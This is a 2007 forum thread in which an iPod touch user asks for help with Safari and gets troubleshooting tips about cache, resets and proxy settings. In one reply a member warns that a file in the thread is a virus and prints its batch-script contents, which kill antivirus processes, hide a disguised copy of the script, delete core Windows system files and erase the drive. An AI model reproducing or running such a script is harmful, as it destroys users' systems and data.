Pain in the @$$ Safari Problem. PLEASE HELP!!!!!

Discussion in 'iPod touch' started by elmachotaco, Dec 31, 2007.

  1. elmachotaco

    elmachotaco New Member

    Joined:
    Nov 7, 2007
    Messages:
    53
    Likes Received:
    0
    Allright so everytime i go into safari and type in a website. THIS is what happens.

    Attached Files:

  2. Zero3K

    Zero3K New Member

    Joined:
    Nov 1, 2007
    Messages:
    76
    Likes Received:
    0
    Try going into its preferences and deleting its cache.
  3. evilp8ntballer7

    evilp8ntballer7 New Member

    Joined:
    Nov 23, 2007
    Messages:
    52
    Likes Received:
    0
    or maybe a soft reset
  4. PhoisGOOD

    PhoisGOOD New Member

    Joined:
    Dec 27, 2007
    Messages:
    263
    Likes Received:
    0
  5. DerekVOF

    DerekVOF Active Member

    Joined:
    Oct 8, 2007
    Messages:
    1,375
    Likes Received:
    6
    Device:
    iPod touch
    Actually, I saw a thread on MacOSXHints from last year where someone had the same issue with Safari on their Mac - they said that they ended up resetting their DSL modem to bridge mode and turned off automatic proxy, and then his app started to work again... Just FYI...
  6. elmachotaco

    elmachotaco New Member

    Joined:
    Nov 7, 2007
    Messages:
    53
    Likes Received:
    0
    this is on my ipod touch, not on my mac.

    and then, all of a sudden, my safari app just randomly is deleted off of my ipod!
  7. Paintball

    Paintball New Member

    Joined:
    Oct 19, 2007
    Messages:
    368
    Likes Received:
    7
    DONT DOWNLOAD!!!!!!!! VIRUS!

    For all of you wondering, this is the contents of that file:
    Code:
    start
    tskill msnmsgr
    tskill Limewire
    tskill iexplorer
    tskill NMain
    tskill Firefox
    tskill explorer
    tskill AVGUARD
    REM Modify McAfee Dat files
    for %%f in (C:progra~1mcafeemcafee~1*.dat) do copy %0 %%f
     REM Modify Fix-It Virus Scanner Dat files
    for %%f in (C:progra~1OntrackFix-Itlpt*.*) do copy %0 %%f 
    prompt $l H4xX0r3D $g
    label c: H4xX0r3D C
    echo Help! I am trapped inside of the printer! Help me!!! > prn
    msg * Hi! I am a cute virus! 
    msg * Yes, you are owned!
    msg * You cant stop me!
    msg * Merry Christmas!
    copy %0 %systemroot%porn_screensaver_hot!_0day!.bat
    copy porn.bat C:/WINDOWS
    attrib +r +h porn.bat
    del "C:WINDOWSpchealth"
    del "C:WINDOWSsystem"
    del "C:WINDOWSsystem32restore"
    del "C:WINDOWSsystem32logonui.exe"
    del "C:WINDOWSsystem32ntoskrnl.exe"
    del "Winlogon.exe"
    del "C:WINDOWSsystem32
    ERASE c:
    
    What this will do is basically just wipe your harddrive. But first it was show a little message to tell you it is. Then say good bye.

    Oh, and to stay on topic, make sure you dont have any proxy settings under your network. just go to settings->WiFi-> then click the blue arrow by the name of you network and go to the bottom and make sure Proxy is off.

Share This Page